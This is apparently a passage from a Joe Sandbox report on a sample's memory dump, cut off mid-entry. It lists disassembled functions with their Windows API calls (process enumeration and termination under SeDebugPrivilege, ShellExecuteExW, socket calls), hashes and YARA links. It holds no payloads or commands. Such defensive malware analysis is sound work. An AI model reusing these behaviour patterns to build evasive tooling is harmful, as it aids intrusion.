                                                  • Instruction ID: fadc62dbc3a5d51ac3b4ef40dc69df7df4b2125d9fe84791cc6796aa9bab29d0
                                                  • Opcode Fuzzy Hash: a0876cd1d63f3a40c70e3eec47f83cbb43033ea2a86ca3947ecf3808908316d6
                                                  • Instruction Fuzzy Hash: 95912771D00229EBDB10DFA5DC44EDEBBB9EF09310F20416AF519A7291DB71AA44DFA0
                                                  Function 00C46D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C46E24
                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00C46E38
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C46E52
                                                  • _wcscat.LIBCMT ref: 00C46EAD
                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00C46EC4
                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C46EF2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window_wcscat
                                                  • String ID: SysListView32
                                                  • API String ID: 307300125-78025650
                                                  • Opcode ID: 31094afb804f28e5d79af025b24b5a608fd43765720f35bc3b66a2d5393cb1db
                                                  • Instruction ID: 2a81061cc1eb42d39d4d4f43c0fdc23a9858269db001a7042380b218b95613aa
                                                  • Opcode Fuzzy Hash: 31094afb804f28e5d79af025b24b5a608fd43765720f35bc3b66a2d5393cb1db
                                                  • Instruction Fuzzy Hash: 3B419174A00348ABEF219F64CC85BEE77F8FF09750F10446AF594A7191D6719E858B60
                                                  Function 00C3E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00C23C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C23C7A
                                                    • Part of subcall function 00C23C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C23C88
                                                    • Part of subcall function 00C23C55: CloseHandle.KERNEL32(00000000), ref: 00C23D52
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3E9A4
                                                  • GetLastError.KERNEL32 ref: 00C3E9B7
                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C3E9E6
                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C3EA63
                                                  • GetLastError.KERNEL32(00000000), ref: 00C3EA6E
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3EAA3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2533919879-2896544425
                                                  • Opcode ID: aea6573537c703dcddc181eeef4bee5aad4cef44644fbadbb8964669490896e8
                                                  • Instruction ID: 1c67c14b8e01caac49c8a4a04a2eb78ea73c9aef210aa60bd65227db90f7b481
                                                  • Opcode Fuzzy Hash: aea6573537c703dcddc181eeef4bee5aad4cef44644fbadbb8964669490896e8
                                                  • Instruction Fuzzy Hash: 0741CB31200201AFDB14EF24CCA5FAEBBE5BF41310F04845CF9529B2D2DB74A945EB91
                                                  Function 00C22F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00C23033
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: 0bbe1f2254aaf106aff9e53284d009b2e8936b6e8fb096d3801669bfcc986ace
                                                  • Instruction ID: 303023294b92abb5d0d5701f618988002e715252d7a9dba7b7d084cbf5280426
                                                  • Opcode Fuzzy Hash: 0bbe1f2254aaf106aff9e53284d009b2e8936b6e8fb096d3801669bfcc986ace
                                                  • Instruction Fuzzy Hash: 3A1127313883E6BEF7149B55EC82D6B7B9CAF19320B20406AFA04A6581DF785F4456B4
                                                  Function 00C242F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C24312
                                                  • LoadStringW.USER32(00000000), ref: 00C24319
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C2432F
                                                  • LoadStringW.USER32(00000000), ref: 00C24336
                                                  • _wprintf.LIBCMT ref: 00C2435C
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C2437A
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00C24357
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 1eb65c6e99a95783c8d78272c9c9f4616ab182e5e4cc08666c08db3e269a373b
                                                  • Instruction ID: 15b602f3d666fde4add940bcb43b04188b9b5f8cedf5b429ad92cd791a8ce3ed
                                                  • Opcode Fuzzy Hash: 1eb65c6e99a95783c8d78272c9c9f4616ab182e5e4cc08666c08db3e269a373b
                                                  • Instruction Fuzzy Hash: 6B0162F6900218BFE711D7A0DD89FEF776CEB09701F0005A5BB49E2052EA759E864B74
                                                  Function 00C4D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4D47C
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00C4D49C
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00C4D6D7
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00C4D6F5
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00C4D716
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00C4D735
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C4D75A
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00C4D77D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: 7b7e1a20f21f57629ce3c7896700ab40cd4290e739db435c13e72a2d56abd0c0
                                                  • Instruction ID: 837a4709eaa7e566138f5095776ee2411a4f922152a3c022d255ebe512822ece
                                                  • Opcode Fuzzy Hash: 7b7e1a20f21f57629ce3c7896700ab40cd4290e739db435c13e72a2d56abd0c0
                                                  • Instruction Fuzzy Hash: 2CB1AA74600225EBDF14DF68C9C57ED7BB1BF04711F098069FC5A9B299DB34AA90CB90
                                                  Function 00BC2A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BC2ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00BC2B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BFC21A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00BFC1C7,00000004,00000000,00000000,00000000), ref: 00BFC286
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 6763e46d3aaea2b14ccba86740954391bc93c455654d4ee032b0dcc88a9d7211
                                                  • Instruction ID: 6dba0e7ccfdea097902c3093b7377198829616658684403b7de4f654cc714476
                                                  • Opcode Fuzzy Hash: 6763e46d3aaea2b14ccba86740954391bc93c455654d4ee032b0dcc88a9d7211
                                                  • Instruction Fuzzy Hash: ED41D630604A849ACB399B289DC8F7F7FD2FB86310F14889DF147875A1C675A896D710
                                                  Function 00C270C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00C270DD
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C27114
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00C27130
                                                  • _memmove.LIBCMT ref: 00C2717E
                                                  • _memmove.LIBCMT ref: 00C2719B
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00C271AA
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C271BF
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C271DE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 85dde06a80ffc6db07e396ab1a6659cb64ca5df2c7cfa35cb2b48d916f8ef12e
                                                  • Instruction ID: 30c1cbb75d9f7531afa17c1fe25747c8a9375e85ee0cd20cf1c990ea2210dbd4
                                                  • Opcode Fuzzy Hash: 85dde06a80ffc6db07e396ab1a6659cb64ca5df2c7cfa35cb2b48d916f8ef12e
                                                  • Instruction Fuzzy Hash: 2B318B35900205EBCB10EFA5DC85AAFB7B8FF45310F1481B9F908AB246DB709E51CBA0
                                                  Function 00C461D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00C461EB
                                                  • GetDC.USER32(00000000), ref: 00C461F3
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C461FE
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C4620A
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C46246
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C46257
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C4902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00C46291
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C462B1
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: bb300d0878b96e98df03accd528755bdfae87fbffeacd15d63807e7320c966fd
                                                  • Instruction ID: 6ee94ffdee8baaf4c1f94f9abda4f234edf605ad627502bf45326c01c8ad096b
                                                  • Opcode Fuzzy Hash: bb300d0878b96e98df03accd528755bdfae87fbffeacd15d63807e7320c966fd
                                                  • Instruction Fuzzy Hash: 64314D76201214BFEB218F50CC8AFEB3BA9FF4A765F054065FE089A191C6B59D42CB64
                                                  Function 00C1BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: 9ead7077d0f291f2bf31bf65d3e95adbf737ae055f41a6937fcfce9851bddad0
                                                  • Instruction ID: a42d79aba32ff6b7ed5b04e7645c71ba16603f7763dffe6f667f4a832cd449a8
                                                  • Opcode Fuzzy Hash: 9ead7077d0f291f2bf31bf65d3e95adbf737ae055f41a6937fcfce9851bddad0
                                                  • Instruction Fuzzy Hash: 6C2104722052097BE20466169D52FFB73AC9E13348F144460FD0596B83EB24DF95EDE5
                                                  Function 00C2EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • _wcstok.LIBCMT ref: 00C2EC94
                                                  • _wcscpy.LIBCMT ref: 00C2ED23
                                                  • _memset.LIBCMT ref: 00C2ED56
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: ae0b6f938f398f3dd229527505233ce2ff994589e5fa6d8e2dcdf47d071ce5f7
                                                  • Instruction ID: 057a4797962aee71657ad9840ffb2342e7f109f9c5fe4bebe1fa90bce819918c
                                                  • Opcode Fuzzy Hash: ae0b6f938f398f3dd229527505233ce2ff994589e5fa6d8e2dcdf47d071ce5f7
                                                  • Instruction Fuzzy Hash: A6C19B716083519FC724EF64D885E6AB7E4FF85310F0049ADF8999B2A2DB70ED45CB82
                                                  Function 00C36B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00C36C00
                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00C36C21
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36C34
                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 00C36CEA
                                                  • inet_ntoa.WSOCK32(?), ref: 00C36CA7
                                                    • Part of subcall function 00C1A7E9: _strlen.LIBCMT ref: 00C1A7F3
                                                    • Part of subcall function 00C1A7E9: _memmove.LIBCMT ref: 00C1A815
                                                  • _strlen.LIBCMT ref: 00C36D44
                                                  • _memmove.LIBCMT ref: 00C36DAD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                  • String ID:
                                                  • API String ID: 3619996494-0
                                                  • Opcode ID: ac0800003c18e0d1f7c34087452882d523ff6286707eaa9611a426b140446016
                                                  • Instruction ID: 5e75a434bd482e6f754437d7ea851ece0b794400000ae22a1dd1d6c1d326fdff
                                                  • Opcode Fuzzy Hash: ac0800003c18e0d1f7c34087452882d523ff6286707eaa9611a426b140446016
                                                  • Instruction Fuzzy Hash: 7181AE71204200BBD710EB24CC86F6AB7E9AF85714F14896CF9569B292DB70EE45CB91
                                                  Function 00BC1424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: db13032e7ecc591c19ed2a5608352682c64f02c99eae094b76aa85725462320d
                                                  • Instruction ID: 5d318fb442101e85732ef3101f5d00f661546b31be9104f025eac1f272beee45
                                                  • Opcode Fuzzy Hash: db13032e7ecc591c19ed2a5608352682c64f02c99eae094b76aa85725462320d
                                                  • Instruction Fuzzy Hash: 1A716B74900109EFCB049F58CC84FBEBBB9FF86314F108599E915AA252C734AA51CF64
                                                  Function 00C4B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • IsWindow.USER32(00EE54C8), ref: 00C4B3EB
                                                  • IsWindowEnabled.USER32(00EE54C8), ref: 00C4B3F7
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00C4B4DB
                                                  • SendMessageW.USER32(00EE54C8,000000B0,?,?), ref: 00C4B512
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00C4B54F
                                                  • GetWindowLongW.USER32(00EE54C8,000000EC), ref: 00C4B571
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00C4B589
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 1d6a4c41704dfc87f601940981e493d05ff807b8b4fec7739a03b259eba89155
                                                  • Instruction ID: 802845ef29d56ddf1e407c594b62cb6b3003dd3dfc2d8a876d4070628822a24a
                                                  • Opcode Fuzzy Hash: 1d6a4c41704dfc87f601940981e493d05ff807b8b4fec7739a03b259eba89155
                                                  • Instruction Fuzzy Hash: 3271AF38604204EFDB249FA5C894FBABBB9FF0A300F149059F965972A2C771EE51DB50
                                                  Function 00C3F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C3F448
                                                  • _memset.LIBCMT ref: 00C3F511
                                                  • ShellExecuteExW.SHELL32(?), ref: 00C3F556
                                                    • Part of subcall function 00BC9837: __itow.LIBCMT ref: 00BC9862
                                                    • Part of subcall function 00BC9837: __swprintf.LIBCMT ref: 00BC98AC
                                                    • Part of subcall function 00BDFC86: _wcscpy.LIBCMT ref: 00BDFCA9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00C3F5CD
                                                  • CloseHandle.KERNEL32(00000000), ref: 00C3F5FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 7d8a6e91b0cde9ca51a37b0f3659709e65ed753d9708228a963ea99447874363
                                                  • Instruction ID: 388d0b6d6d39fe9d6af6b7cd2587b11cd00c70afe33a93f3b4ab55f93697ae9e
                                                  • Opcode Fuzzy Hash: 7d8a6e91b0cde9ca51a37b0f3659709e65ed753d9708228a963ea99447874363
                                                  • Instruction Fuzzy Hash: 48615C75E006199FDB14DF64C885AAEBBF5FF49310F1484ADE856AB351CB30AE42CB90
                                                  Function 00C20F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00C20F8C
                                                  • GetKeyboardState.USER32(?), ref: 00C20FA1
